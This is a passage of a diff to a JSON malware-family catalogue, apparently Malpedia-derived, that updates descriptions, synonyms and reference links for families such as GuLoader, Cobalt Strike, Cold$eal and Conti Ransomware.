"https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/", + "https://twitter.com/VK_Intel/status/1255537954304524288", + "https://twitter.com/TheEnergyStory/status/1239110192060608513", + "https://twitter.com/VK_Intel/status/1252678206852907011", + "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", + "https://twitter.com/sysopfb/status/1258809373159305216", + "https://research.checkpoint.com/2020/guloader-cloudeye/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.joesecurity.org/blog/3535317197858305930", + "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services", + "https://twitter.com/VK_Intel/status/1257206565146370050", + "https://blog.morphisec.com/guloader-the-rat-downloader", + "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/", + "https://twitter.com/TheEnergyStory/status/1240608893610459138", + "https://www.crowdstrike.com/blog/guloader-malware-analysis/", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/", + "https://malwation.com/malware-config-extraction-diaries-1-guloader/", + "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/", + "https://labs.k7computing.com/?p=20156" + ], + "synonyms": [ + "GuLoader", + "vbdropper" + ], + "type": [] + }, + "uuid": "966f54ae-1781-4f2e-8b32-57a242a00bb9", + "value": "CloudEyE" + }, { "description": "", "meta": { @@ -5881,7 +11467,6 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", "https://twitter.com/ClearskySec/status/963829930776723461", - "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], @@ -5911,21 +11496,185 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.brighttalk.com/webcast/7451/462719", "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", - "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", - "https://blog.cobaltstrike.com/", - "https://www.cobaltstrike.com/support", - "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://community.riskiq.com/article/0bcefe76", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py", + "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html", + "https://www.secureworks.com/research/threat-profiles/bronze-president", + "https://blog.macnica.net/blog/2020/11/dtrack.html", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/", + "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", + "https://isc.sans.edu/diary/26752", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/", "https://401trg.com/burning-umbrella/ ", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", + "https://github.com/sophos-cybersecurity/solarwinds-threathunt", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", + "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", + "https://asec.ahnlab.com/ko/19860/", + "https://www.youtube.com/watch?v=gfYswA_Ronw", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", + "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", + "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", + "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", + "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://malwarelab.eu/posts/fin6-cobalt-strike/", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", + "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/", + "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", + "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", + "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", + "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://isc.sans.edu/diary/rss/26862", + "https://isc.sans.edu/diary/rss/27176", "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", + "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf", + "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", + "https://community.riskiq.com/article/f0320980", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", + "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://github.com/Apr4h/CobaltStrikeScan", + "https://twitter.com/VK_Intel/status/1294320579311435776", + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", + "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/", + "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/", + "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt", + "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/", + "https://www.secureworks.com/research/threat-profiles/gold-dupont", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", + "https://www.cobaltstrike.com/support", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", - "http://cyberforensicator.com/2018/12/23/dissecting-cozy-bears-malicious-lnk-file/" + "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", + "https://blog.cobaltstrike.com/", + "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", + "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html", + "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", + "https://www.macnica.net/file/mpression_automobile.pdf", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://www.youtube.com/watch?v=LA-XE5Jy2kU", + "https://mez0.cc/posts/cobaltstrike-powershell-exec/", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", + "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://twitter.com/swisscom_csirt/status/1354052879158571008", + "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", + "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://connormcgarr.github.io/thread-hijacking/", + "https://paper.seebug.org/1301/", + "https://web.br.de/interaktiv/ocean-lotus/en/", + "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", + "https://redcanary.com/blog/getsystem-offsec/", + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/", + "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", + "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://asec.ahnlab.com/ko/19640/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", + "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html" + ], + "synonyms": [ + "Agentemis", + "BEACON", + "CobaltStrike" ], - "synonyms": [], "type": [] }, "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", @@ -5946,13 +11695,19 @@ "value": "Cobian RAT" }, { - "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager.", + "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager. It's CRM mailslot module was also observed being downloaded by ISFB.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", + "https://www.group-ib.com/blog/renaissance", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/cobalt_upd_ttps/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", + "https://www.netscout.com/blog/asert/double-infection-double-fun", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", - "https://www.group-ib.com/blog/renaissance" + "https://www.secureworks.com/research/threat-profiles/gold-kingswood" ], "synonyms": [ "COOLPANTS" @@ -5967,11 +11722,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", - "https://github.com/hfiref0x/TDL", - "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://github.com/hfiref0x/TDL", + "https://www.circl.lu/pub/tr-25/", "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", - "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/" + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://github.com/sisoma2/malware_analysis/tree/master/turla_carbon", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf" ], "synonyms": [ "Carbon" @@ -6021,12 +11783,13 @@ "value": "Cohhoc" }, { - "description": "", + "description": "Coinminer is an unwanted malicious software which uses the victim's computational power (CPU and RAM mostly) to mine for coins (for example Monero or Zcash). The malware achieves persistence by adding one of the opensource miners on startup without the victim's consensus. Most sophisticated coin miners use timer settings or cap the CPU usage in order to remain stealthy.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/", - "https://secrary.com/ReversingMalware/CoinMiner/" + "https://secrary.com/ReversingMalware/CoinMiner/", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/" ], "synonyms": [], "type": [] @@ -6034,6 +11797,51 @@ "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", "value": "Coinminer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldlock", + "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "140f271b-0be1-4455-96c6-015632ade33a", + "value": "ColdLock" + }, + { + "description": "Cold$eal is a packer for encrypting (sealing) malware. It contains some AV-evasion techniques as well as some sandbox-detection. It was developed by $@dok (aka Sadok aka Coldseal).\r\nIt was available as a cryptor service under the url coldseal.us and was later sold as a toolkit consisting of the cryptor and a custom made cryptostub including a FuD garantee backed by free update to the cryptostub. The payload was encrypted using RC4 and added to the cryptostub as a resource. The encryption key itself was stored inside the resource as well. Upon start the cryptostub would extract the key, decrypt the payload and perform a selfinjection using the now decrypted payload.\r\nNote: The packed sample provided contains some harmless payload, while the unpacked sample is the bare cryptostub without a payload.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coldseal", + "https://www.xylibox.com/2012/01/coldeal-situation-is-under-control.html", + "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/", + "https://www.youtube.com/watch?v=242Tn0IL2jE", + "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/", + "https://www.xylibox.com/2012/01/cracking-coldeal-541-fwb.html" + ], + "synonyms": [ + "ColdSeal" + ], + "type": [] + }, + "uuid": "8d5b7766-673c-493f-b760-65afd61689cb", + "value": "Cold$eal" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba", + "https://www.vmray.com/cyber-security-blog/cutting-off-command-and-control-infrastructure-collectorgoomba-threat-bulletin/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5c0f96fd-54c0-44cd-9caf-b986e3fa2879", + "value": "CollectorGoomba" + }, { "description": "", "meta": { @@ -6078,6 +11886,36 @@ "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", "value": "Combos" }, + { + "description": "This malware was found in a backdoored Visual Studio project that was used to target security researchers.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comebacker", + "https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/", + "https://norfolkinfosec.com/dprk-targeting-researchers-ii-sys-payload-and-registry-hunting/", + "https://www.anquanke.com/post/id/230161", + "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/", + "https://norfolkinfosec.com/dprk-malware-targeting-security-researchers/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "44240b4b-09d3-4b6b-a077-bce00c35ea38", + "value": "ComeBacker" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comfoo", + "https://www.secureworks.com/research/secrets-of-the-comfoo-masters" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f5044eda-3119-4fcf-b8af-9b56ab66b9be", + "value": "Comfoo" + }, { "description": "", "meta": { @@ -6091,15 +11929,33 @@ "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", "value": "ComodoSec" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun", + "https://securelist.com/compfun-successor-reductor/93633/", + "https://securelist.com/compfun-http-status-based-trojan/96874/", + "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", + "https://securelist.com/apt-trends-report-q2-2019/91897/" + ], + "synonyms": [ + "Reductor RAT" + ], + "type": [] + }, + "uuid": "541d5642-0648-4b5a-97b9-81110f273771", + "value": "COMpfun" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", - "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", - "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research" + "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/" ], "synonyms": [ "lojack" @@ -6141,12 +11997,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", - "https://www.honeynet.org/files/KYE-Conficker.pdf", + "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", - "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", "https://github.com/tillmannw/cnfckr", - "http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf", "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], "synonyms": [ @@ -6165,6 +12019,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/", + "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [], @@ -6177,12 +12032,51 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", - "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.conti", + "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/", + "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/", + "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-evasive-by-nature/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://github.com/cdong1012/ContiUnpacker", + "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/", + "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", + "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware" ], "synonyms": [], "type": [] }, + "uuid": "c9dca6f3-2a84-4abe-8f33-ccb7a7a0246c", + "value": "Conti Ransomware" + }, + { + "description": "FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", + "https://content.fireeye.com/apt/rpt-apt38", + "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks", + "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" + ], + "synonyms": [ + "WHITEOUT" + ], + "type": [] + }, "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", 